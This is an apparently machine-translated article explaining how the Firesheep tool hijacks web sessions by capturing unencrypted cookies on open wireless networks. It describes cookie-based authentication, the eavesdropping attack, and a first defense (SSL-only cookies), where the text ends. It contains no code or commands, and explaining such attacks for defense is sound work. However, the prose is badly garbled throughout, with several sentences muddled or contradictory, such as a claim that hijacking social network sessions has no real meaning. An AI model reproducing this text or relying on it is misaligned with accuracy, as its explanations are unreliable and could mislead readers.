Hackers can use Firesheep eavesdropping isn't encrypted data on the wireless network, and can steal those login to popular sites other user's session. Hackers use this tool can visit users access to popular website to use when account, such as the well-known Facebook accounts, etc. In fact, this tool is to use a insiders are known as a loophole: session support. Because so far, still not fully resolved this loophole.

In this paper, the author will discuss the mechanism behind Web authentication, because it is this the authentication makes session hijacking can succeed. Talk about how to use these loopholes, Firesheep to discuss the final section website administrator, web developers, end users can take measures to protect them.

Authentication basics. WEB

1, user authentication website needs.

2, users with a username and password for verification.

Three, website to verify user password, if passed, then allow users to log in to, and will be a cookie gives users the browser. This cookie used for unique identity session.

4, users continue to visit the website. Request a new page in the user, the browser will send cookie and user requests, remind Web server: this request is the front part of authentication connection.

In most cases, Web developers, and the webmaster can use HTTPS encryption to protect this process of the second step, they all know if other people can access other users user name and password, you can easily gain access rights. In many cases, they will turn to use a not encrypted HTTP connection, so as to realize the rest of the Web communications, including the exchange of cookie.

Session hijacking attacks and Firesheep

Here's session hijacking attacks. If successfully blocked the eavesdropper on the fourth step occurred in any communication, he can easily access cookie. Once you know the contents of the cookie, eavesdropper on can forge an HTTP request, a cookie visit user account using.

Many well-known website (including Facebook, etc) are vulnerable to a social networking site the dangers of such attacks. But the network bank and some e-commerce site will encrypt their all communications. Social network sites session hijacking of people don't have any real meaning.

Hope to steal another conversation guy first needed to connect to an open wireless networks, restarting Firesheep, then wait for a loophole users appear on the screen. If there was an attractive target, attack just click his name, can complete access to the user's session.

Defense Firesheep etc session hijacking attacks

Defense Firesheep and other session hijacking the best defence against is WEB developers and WEB server management personnel. If you develop WEB application dependent on cookie to achieve session management, will ensure that in a safe way of managing the conversation. Here are a couple methods:

1st, only by SSL to send a cookie. If you ask the browser in cookie before transmission encryption on the transmission, not easy being attacked.